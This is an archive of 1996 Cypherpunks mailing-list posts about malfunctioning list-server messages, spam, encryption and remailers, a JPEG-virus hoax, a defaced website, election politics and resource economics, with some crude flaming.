> >> This is bizzare.  I have gotten three messages with this message.
> >> 
> >> Is someone at Netscape canceling messages?  (mcom.com is the old
>  domain name
> >> of Netscape.)
> >> 
> >> Anyone have any ideas on this?
> >
> >I don't have a clue what it is, but it's sure pissing me off.  I've 
> >gotten about 15 or so of these messages in the past two hours.  If it's
> >an honest error, then someone better fix it real fast; if some loser is
> >jerking us around, ......
> 
> Some list redirector of somesort has gone wonky at Netscape.  (Take a
>  look
> at the headers if you do not believe me.  They are originating off of
>  some
> internal lists at mcom.com, the original Netscape domain.)
> 
> Cypherpunks is not the only list effected by this.  I am getting these
>  weird
> messages on wwwsecurity as well.
> 
> Since it is Friday, I expect that this will be with us until someone
>  gets in
> the office on Monday.
> ---
> |  "Remember: You can't have BSDM without BSD. - alan@ctrl-alt-del.com 
>  "|
> |"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:        
>  |
> | mankind free in one-key-steganography-privacy!"  | Ignore the man     
>  |
> |`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the
>  keyboard.|
> |         http://www.teleport.com/~alano/          | alano@teleport.com 
>  |
> 
> 
> 



Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMh+m98tPRTNbb5z9AQFtaQf/d1cfjPtP/ShlLBq1FiMmw28A2PaRpTmP
WOecpRisL6zouGYGGLzlUQk1oSMB2bz82Zk+K6LWAQj1b4jIuT6++UI0RXSwPE72
5+c1S3IIUzZNNTbZnVlKoGky06JV8xZWsbPwnDSuqJ/i5QHs7U8DUi1KrKztxYv+
i1raWmAK6Ib9q9YJ1Ub6591FEpROkfUHtbuPZ7EvvvVOwaEVNlxGOqQt6DHPeGb4
UAApKB5sbj1mGuThj3ijVoulwnaKaxvo3Ke3iN9+F8C+uNQmGwZnyVxmlrDz9Fjn
pjfrpOd2oGUZ1pPkDgd5tEg2vJX0aNREj544szHJD3caqCmt0S6adw==
=WAdH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Firebeard <stend@grendel.austin.texas.net>
Date: Sat, 24 Aug 1996 15:56:16 -0700 (PDT)
To: vipul@pobox.com
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <Pine.BSF.3.91.960821150339.9917H-100000@mercury.thepoint.net>
Message-ID: <199608242252.RAA05122@grendel.austin.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Vipul Ved Prakash writes:

>> Free (commercial)speech for you (perhaps at our expense), but no
>> free speech for us?

VVP> This is peculiar. Nobody seems to mind ads in Newspapers, printed
VVP> magazines, TV, and for that matter web sites. That is unwanted
VVP> stuff too, but now someone is paying for it.

	In the first three cases, the advertising subsidises the cost
of the media - ever notice that the advertiser-free[1] channels are more
expensive?  In the last case, I decide to request the advertising,
increasing my time on-line, potentially increasing my cost of access.
In the case of email spam, the advertiser decides to force me to
receive the advertising, increasing my time on-line, potentially
increasing my cost of access.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
ObCDABait:      For she doted upon their paramours, whose flesh is as the
flesh of asses, and whose issue is like the issue of horses.  [Eze 23:20]
Unsolicited solicitations will be proofread for a US$500/KB fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 24 Aug 1996 18:21:37 -0700 (PDT)
To: Mike Howell <451degree@msn.com>
Subject: Re: your mail
In-Reply-To: <UPMAIL01.199608241925150568@msn.com>
Message-ID: <Pine.LNX.3.93.960824193104.144A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 24 Aug 1996, Mike Howell wrote:

> Does anybody know what I can get for generating the credit card numbers?

     3 to 5 if you get caught using them for the wrong thing.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Cortes <mcortes@earthlink.net>
Date: Sat, 24 Aug 1996 22:05:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: please take me of this list
Message-ID: <321FB791.1CAB@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


PLEASE, PLEASE get me off this cypherpunk mailing list.  my brother signed me 
up (on my account) as some idea of a joke...but it is flooding my email....if 
someone would take the time to take me off, i would be ever so greatful

*sarah*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 24 Aug 1996 19:50:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Degaussing a pile of 5.25" media
In-Reply-To: <0ig7sD1w165w@bwalk.dm.com>
Message-ID: <199608250248.VAA24644@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> 
> I have 3 bags full of 5.25" diskettes (in NYC). Can someone please let me use
> their degausser before I get rid of them? (Anyone who wants them after they're
> degaussed is welcome to them :-)
> 

I can degauss your diskettes, for free.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 24 Aug 1996 20:22:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Encrypted tape archive  solution?
Message-ID: <199608250320.WAA24760@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Hi,

I have a linux system and create tape archives every night. Most 
sensitive data files are encrypted, but I want the whole tape archive
to be encrypted just for the peace of mind. 

Is there any simple solution for linux 2.0 that allows to create
encrypted archives?

Another question: suppose I use Matt  Blase's CFS. Is it safe to backup 
the _encrypted_ files, and not the mounted directory that looks decrypted?
(i.e., not the "attached" filesystem).

Thanks,

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 24 Aug 1996 22:50:40 -0700 (PDT)
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Interesting
Message-ID: <19960825055044046.AAA85@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


The body-suppressed problem seems to be continuing.  I'm getting almost no
normal list traffic.  Does anyone think that someone might be trying to halt
the list?

/ If you think education is expensive, try ignorance.
/ Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
/ Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
/ Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
/ Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sat, 24 Aug 1996 23:29:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Fishy stuff
Message-ID: <199608250629.XAA29349@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


I just read a supressed message from me about a topic I never wrote 
about.  This IS PISSING me off.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sat, 24 Aug 1996 22:20:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cypherpunk voting - ITAR or CDA
Message-ID: <Pine.LNX.3.91.960825012703.9463A@offshore>
MIME-Version: 1.0
Content-Type: text/plain



Dole says he would fix the ITAR problem, but try to keep something like
CDA. 

Clinton is keeping ITAR and signed CDA.  But not having the religious
right he might soften on CDA.

The courts seem to be throwing out CDA much faster than ITAR (some fast
track to the supreme court built into the law).  It also seems like ITAR
is the more important thing to fix (it is easier to move pornography etc
out of the US than major software companies). 

So it seems Dole is the better vote.  Is this important enough to many
cypherpunks to actually determine their vote?

  --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Sat, 24 Aug 1996 23:30:09 -0700 (PDT)
To: vipul@pobox.com
Subject: Re: Weird "Suppression" messages
Message-ID: <199608250622.CAA18195@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Vipul Ved Prakash writes:
>> 
>> I don't have a clue what it is, but it's sure pissing me off.  I've 
>> gotten about 15 or so of these messages in the past two hours.  If it's 
>> an honest error, then someone better fix it real fast; if some loser is 
>> jerking us around, ......
>> 
>
>Is this all becuz of those bad nameserver records floating around the net?
>Tons of ISP's have gone down!
>

I hope that's all this is.  Because 90% of the notes I am getting, at BEST,
contain supressed message bodies.  This is really starting to frighten me.

Daniel.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 1 Sep 1996 17:29:10 +0800
To: cypherpunks@toad.com
Subject: Re: ^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿WARNING^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿ vIRuS!
In-Reply-To: <3.0b11.32.19960831234035.00b1f6cc@mail.teleport.com>
Message-ID: <199609010741.AAA25267@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen writes:

> This is the clueless kind of crap I expect pitched to AOL users and
> upperlevel management.

> GIF and JPEGs contain *NO* executable code.  You cannot get viruses
> from them.  You obviously have no clue as to what the hell you are 
> talking about. 

> The only way that you could obtain the effects described above is 
> with Black Magic and/or Voodoo.  (And not even then.)

I don't want to restart the jpg-virus flame war again, and this 
particular story is likely completely bogus, but I should point out 
that most complicated software, including jpeg viewers, has
undiscovered bugs lurking about.  It is also not particularly
difficult to find a garbage input file for most sloppily written
programs which bombs the program into branching into one of its
data buffers.  Indeed, it wasn't so long ago that you could get
httpd to put crap on its own stack by feeding it an excessively
long URL. 

So I would certainly not be surprised if someone managed to 
construct a .jpg file which would do nasty things to ones machine
if loaded with a specific viewer, and give an error message when 
loaded by other software.  

If the viewer was a widely used one, and the .jpg was posted on 
Usenet with an alluring title, one could probably do quite a bit
of damage before people got wise.  

Not a virus in the traditional sense, but a fairly common way
to attack complicated operating systems and applications. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 2 Sep 1996 06:23:48 +0800
To: jimbell@pacifier.com
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
Message-ID: <199609012034.NAA11901@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:11 PM 8/31/96 EDT, patrick b cummings wrote:
> I agree with what you are saying but not all polititions are that bad. 
> You make it sound as if their are no politisions are for freedom of the
> net.

So who is the exception?
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Sun, 1 Sep 1996 15:53:28 +0800
To: kickboxer <charlee@netnet.net>
Subject: Re: WARNING vIRuS!
In-Reply-To: <199608311621.LAA20992@netnet1.netnet.net>
Message-ID: <Pine.BSI.3.91.960901011541.25633A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 31 Aug 1996, kickboxer wrote:

> 99.9% of
> virus scanners and other antivirus programs will not recognize it


> scan all images upon download!

duh




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sun, 1 Sep 1996 21:02:53 +0800
To: cypherpunks@toad.com
Subject: Pseudonym server: Jenaer Anonymous Service <anon@as-node.jena.thur.de>
Message-ID: <199609011109.EAA24157@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Jenaer Anonymous Service <anon@as-node.jena.thur.de> 
looks like a high-security pseudonym server.  
You can send outgoing mail to email or newsgroups.
It accepts encrypted email addressed to anon-hexkeyid@as-node.jena.thur.de,
where hexkeyid is the keyid for a PGP key you send it;
it doesn't store any information about the owner of the key.
To pick up your mail, you send it an encrypted message
with the keyid and a Reply-To: header, and it sends you your mail
by mixmaster.

It's a bit less user-friendly than some servers,
since you not only need PGP, but you need to pick up your mail
rather than having it arrive directly.  But in return,
it's pretty secure, since you can only get caught if the
remailer or its operator are compromised when you request a delivery.

I haven't yet checked if how flexible it is about the location
of Reply-To: in the headers, since some mailers make it difficult
to paste that in.  

The public key for the server is signed by Lutz.Donnerhacke@Jena.Thur.De,
which is in turn signed by  0x3B7F286D, which MIT thinks is an unknown
signator...

The help message has a policy against illegal activity, flamewars,
and binary files, and says people can be blacklisted for abuse.
Because you don't get your reply email until you ask to pick it up,
it does seem easy to abuse; complaints, flames, and mailbombs won't reach you
if you don't ask for them.  I hope the operator doesn't mind the workload
of managing the remailer - it looks like a good service, and with
Julf's remailer shut down, we need more nymservers.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.net>
Date: Sun, 1 Sep 1996 21:22:09 +0800
To: Cypherpunks@toad.com
Subject: The Three Horsemen???
Message-ID: <Pine.SUN.3.94.960901042858.15814A-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It seems most everywhere I turn, either on the Internet or on 
television there is some reference to the Four Horseman of the 
Infocalypse, -Terrorists, Pedophiles, Drug Dealers and Money
Launderers, But no real hard evidence.

But since the story broke in the Observer I have been trying 
to remember where I heard of Toby Tyler before, I belive it 
was on a television show on the Discovery Channel that Tim May 
was in, and recently I found this about Mr. Tyler in the 
Clari. newsgroups reporting on the child sex trade.

==

 One professional cybercop is Toby Tyler, who surfs the Net from 
his computer terminal in the San Bernadino (Calif.) County 
Sheriff's Department. He searches for scams, sources of child 
porn, and deceptions designed to entrap children. Five 
investigators in his department are busy full-time investigating 
child sexual exploitation - much of it flowing from pedophiles 
trying to set up meetings with children by computer.
 
 The Internet is a ``two-edged sword'' for child pornographers,  
Deputy Tyler says. On the one hand, he says, it seems to have 
damaged the profitability of pornographers who sell their wares 
via dial-up computer ``bulletin board.'' There is so much free 
stuff on the Internet - why would anyone pay? 

==

Wouldn't the Observer article about anon.penet.fi transmitting
75 to 90% of the child porn on the Internet lead you to belive
that since it has been shut down that all Internet child porn
will pretty much dry up?

I Wonder if its now the Three Horsemen of the Infocalypse? <g>


William Knowles
erehwon@c2.net


         
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMimNkQURbnwsNLz5AQEncgQAonfr7b67BZfLOjJxnS8GzlZ3RSoGYBMT
07uacF3sIkH9vyXVnG3O4BKbptb28dPBm1OoN7dufTyu7WxEi91sQNcY++MUmwhO
vRR+yWcSWTAeOb1AwDZFXxRLdFCJHbshb6M6P4ECa2VA6ONGH/lTgy/dZS6Zk1Nb
vD7jCUw8k2s=
=jRGc
-----END PGP SIGNATURE-----

--
William Knowles    <erehwon@c2.net>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Vote for Harry Browne in November -- http://www.HarryBrowne96.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 1 Sep 1996 21:32:03 +0800
To: cypherpunks@toad.com
Subject: Re: Code Review Guidelines (draft)
In-Reply-To: <199608312040.PAA20696@manifold.algebra.com>
Message-ID: <1kkkTD37w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> pOL@BILA PARNQ Q,
> oKAZALSQ BEZ HUQ.
> nA HUQ MNE BEZ HUQ,
> kOGDA S HUEM DO HUQ?

dEWKI W GOSTI PRIGLA[ALI,
dA Q W GOSTI NE PO[EL -
pIDVA^I[KO NA MNE RWANYJ,
dA HUI[KO NEBOLX{OJ.

Decrypt this, Midwestern swines.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 1 Sep 1996 21:31:35 +0800
To: cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <ae4dc381000210043ce5@[205.199.118.202]>
Message-ID: <i5kkTD39w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Senile tcmay@got.net (Timothy C. May) (fart) rants:

> (* I find it Orwellian that being "polite" is taken to mean not saying
> anything controversial. It was impolite for Salman Rushdie to write "The
> Satanic Verses," is was impolite for people to mention Karla Homulka in
> talk.politics.canada, it was impolite to point out that the prime minister
> of India drinks a glass of his own urine every day, it was impolite to
> refer to Bill Clinton's dalliances with Paula Jones, and so on.

Paula Jones is a virtuous woman. Her boss, Bill Clinton, pulled down his
pants and ordered her to kiss his erect penis.  She refused and was fired.
I think it's factually incorrect to describe this sexual harrassment as
"dalliances", but we already know that senile Tim May (fart) never lets
any facts get in the way of his agenda. It may be impolite to fart
in senile Tim May's (fart) general direction, but we do.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@central.cis.upenn.edu>
Date: Sun, 1 Sep 1996 20:53:04 +0800
To: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Subject: Re: Esther Dyson on Remailers
Message-ID: <3.0b11.32.19960901065251.00715d08@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


EFF does not, to my knowledge, (and I am a Board Member) have an
organizational view on this issue. There are a lot of different views and
each member of EFF has their own view that they can and will state as
private people. The tendency of the Press to label people with organizations
affiliation ship gives the impression of organizational views. For example I
certainly don't speak for the University of Pennsylvania when I say thing to
the newspapers.

Dave

http://macpond.cis.upenn.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Sun, 1 Sep 1996 22:44:36 +0800
To: cypherpunks@toad.com
Subject: hackers texts
Message-ID: <19960831.074413.9510.3.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


If any of you hackers out their have wrote any texts for beginning
hackers  or know of any please send them to me at patrickc@juno.com
            thank you
    P. cummings
    Patrickbc@juno.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Sun, 1 Sep 1996 22:50:23 +0800
To: bugtraq@netspace.org
Subject: re:hackerlist
Message-ID: <19960831.074413.9510.2.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


I am planning to make a list of hackers and would appreciatte it if you
would e-mail me with the following information.
handle
e-mail
city,state
url
whether or not you would like to recieve the list when finished
                                   thanks for your help
    P. Cummings
    Patrickbc@juno.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 01:05:27 +0800
To: snow@smoke.suba.com (snow)
Subject: Re: Moscowchannel.com hack
In-Reply-To: <Pine.LNX.3.93.960831151026.1002B-100000@smoke.suba.com>
Message-ID: <199609011509.KAA26254@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


snow wrote:
> 
> On Sat, 31 Aug 1996, Joel McNamara wrote:
> 
> > Not really crypto, but related to the DOJ hack in a way.
> > 
> > Moscow Channel is a pretty slick, Russian news/commentary page.  Their Web
> > site was hacked and altered by someone who didn't seem to like Russians all
> > Just a matter of time before some builds a dedicated Satan type tool that
> > scans for  HTTP server holes or messed up file permissions to make locating
> > potential victims easy.
> Write your web site to a CD-ROM and hard-code the base directory into the
> webserver.

A hacker who has root can forcibly unmount the cdrom and mount another
directory on that node. Not a good solution.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sun, 1 Sep 1996 20:13:50 +0800
To: cypherpunks@toad.com
Subject: RE: Desubscribe
Message-ID: <841572883.28748.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Whoever uses the term "spam" in derogatory manner, opposes free
> speech and deserves to be caned.

Whoever uses the term "spam" in a non-derogratory manor is an 
arsehole and deserves to be shipped to sweden where they shall be 
made into cheese by nuns.


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sun, 1 Sep 1996 20:26:23 +0800
To: cypherpunks@toad.com
Subject: Re: Encryption
Message-ID: <841572886.28792.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Algorithm: Select bit-groups of random length from the file until the file is
>            completely processed.  Shuffle the bits in each group randomly and
>            save each group back to the file. Repeat if needed using different
>            key-strings for each successive encryption, for increased security.

You pay no attention whatsoever to key distribution, the fact that 
this is just a form of permutation and no substitution is used, also 
how do you account for the fact that the user`s random number source 
may not be strong, even recognized rng`s like the keyboard latency 
routines in pgp grind to a halt when faced with a hardware 
perculiarity like a keyboard buffer etc...


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Durham <bdurham@metronet.com>
Date: Mon, 2 Sep 1996 01:34:07 +0800
To: patrick b cummings <patrickbc@juno.com>
Subject: Re: hackers texts
In-Reply-To: <19960831.074413.9510.3.patrickbc@juno.com>
Message-ID: <3229ADAB.7FD5@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Again, you may want to do a web search with Yahoo (www.yahoo.com) or
hotbot (www.hotbot.com) or whatever.  There is loads of good info out
there and pointers to ftp sites ... you just need to do a little bit of
legwork to find it all.  (Along with being creative when asked for
keywords by the search engines)

Brian
bdurham@metronet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 02:29:52 +0800
To: cypherpunks@toad.com
Subject: Bob Dole on Drugs
Message-ID: <199609011633.LAA30982@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


http://allpolitics.com/news/9608/31/radio.addresses/

... snip ...

   Dole, who returned to Washington for Labor Day
   weekend, also pledged to use the White House as a
   bully pulpit to promote the "moral message"
   against drugs and to criticize what he called the
   entertainment industry's glamorization of drug use.

   On Sunday, he is to address the convention of the
   National Guard Association of the United States
   during which he's expected to propose that the
   military be enlisted to assist in a renewed war on
   drugs. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Sep 1996 04:34:02 +0800
To: cypherpunks@toad.com
Subject: Conservation Laws, Money, Engines, and Ontology
Message-ID: <ae4e1b2601021004a736@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


Keywords: agoric systems, computational ecologies, resource auctioning,
Mark Miller, K. Eric Drexler, Bernardo Huberman, contracts, distributed
trust, metered usage, software objects, software ICs, superdistribution,
Brad Cox, emergent order.

In physics there are various conservation laws: conservation of energy,
mass, charge, and whatnot. You all know about this... Conservation of mass
says that mass is neither created nor destroyed. (For smart aleck
quibblers, conservation of mass-energy.)

How does this relate to our issues?

"Abuse of Resources": Mail loops, infinite loops, spamming, overloads of
networks, and congestion in general are cases where "unrealistic" models of
costs are implemented in software. In the real physical world, infinite
loops don't occur (at least not in the sense seen with mail loops, as a
relevant example.)

Conservation laws are related to the "cost model" of the universe. Real
physical objects have costs, or ontological status, or presence.... (Please
don't read too much into this point...I mean to be suggestive, not
literal.)

There are no "memory leaks" in the universe which suddenly fill it up with
stuff, no perpetual motion machines, no creation and destruction of
objects.

Cyberspace Ontologies: There are several things which need to be done to
make the cyberspatial world more like the spatial world:

* payment for CPU cycles consumed (via contractual, permission-based
access: "If you want access to this machine, here are the terms and
conditions.")

* metering mechanisms, such as e-stamps for e-mail (essentially a special
case of the first point, where a machine says "I'll pass on your message if
you pay me to.")

* digital contracts, agreements on usage and payment  (resource auctioning,
or the "smart contracts" that Nick Szabo has written about)

(you can all think of additional examples....)

Cryptographic protocols have their uses here, but there are also some other
measures which bear looking into. In the LISP community, for example, work
has been done on "engines," which are building blocks that are "fueled up"
with "CPU fuel" and allowed to run for some amount of CPU cycles. Thus, one
could put an engine into a process and it would run for some number of
ticks, then stop.

(I'm sure there are Unix-level tools which do similar things, in terms of
giving a spawned process so many ticks of the clock. The "engines" concept
is somewhat more semantically clean, in that it's pushed down into the
"ontology" of the thing being simulated or run, and is not at the "God
level" (to use a non-technical term!).)

Now, certainly I support the right of any person or machine to run programs
freely and without charge, to pass on e-mail free of charge, to run
remailers for no charge, to accept spam mail without complaint, and so on.

What I'm suggesting is that many of the problems being seen with overuse of
resources, spam, congestion, and denial of service are really due to a poor
model of resource allocation. Unix and other modern operating systems offer
various tools for helping to constrain such problems, but, I submit, better
methods are needed.

(Especially when multiple machines, networks, and even anonymous sites are
part of the overall system....clearly the constraints must be managed
locally, and via "contract," as part of a computational ecology, and not as
a hierarchical, top down Unix-type operating system.)

Economics is about the "allocation of scarce resources." Many of the
existing models being used treat various scarce resources as _free_. Then,
when the inevitable problems occur, calls for top-down regulation are heard
(e.g., the frequent calls for illegalization of "unwanted mail").

In my view, building a consistent, distributed, "conservative" system is
what Cypherpunks need to be thinking about.

(I used the term "conservative" in the physics sense. A system in which
various conservation laws are obeyed.)

As I said before, this should not be compelled, but voluntary. However,
those who give their resources away for free (choosing not to adopt a
conservative ontology, in other words) should be in no position to complain
or run to the government for top-down regulation because there freely-given
resources are being overused or "abused" (in their thinking).


And closely related to this whole issue--and something I've written about
extensively--is the issue of "building walls in cyberspace." In the real
world, persistent structures are build out of real materials, resulting in
castles, forts, skyscrapers, bridges, houses, highways, etc. These objects
have persistence, have controllable access (gates, doors, locks,...), and
have "structural integrity."

Cryptographic and distributed trust protocols are about the only means I
can think of for constructing the equivalents in cyberspace. (And to a
large extent, this is already happening: the Net and the Web have structure
which cannot be demolished casually, or by top-down orders from any single
national leader. Millions of machines, linked in various ways and
implementing various protocols and "terms of service" with users and other
machines....an early version of the "conservative" system I think we'll
someday see.)

Well, this gives the flavor of my points. I haven't rigorously argued all
of the points, but the Cypherpunks forum is for presenting informal
arguments.

Thoughts?

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agt387465@blackhel.fbi.gov (David Pfeiffer 387465)
Date: Mon, 2 Sep 1996 02:39:15 +0800
To: cypherpunks@toad.com.bugtraq@netspace.org
Subject: Hacker list information
Message-ID: <m0uxFhM-001uVnC@kirin.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


Patrick: 

I am interested in a copy of your mailing list. Thank you.

David Pfeiffer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Angelos D. Keromytis" <angelos@gradin.cis.upenn.edu>
Date: Mon, 2 Sep 1996 02:02:24 +0800
To: Alan Horowitz <alanh@widomaker.com>
Subject: Re: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
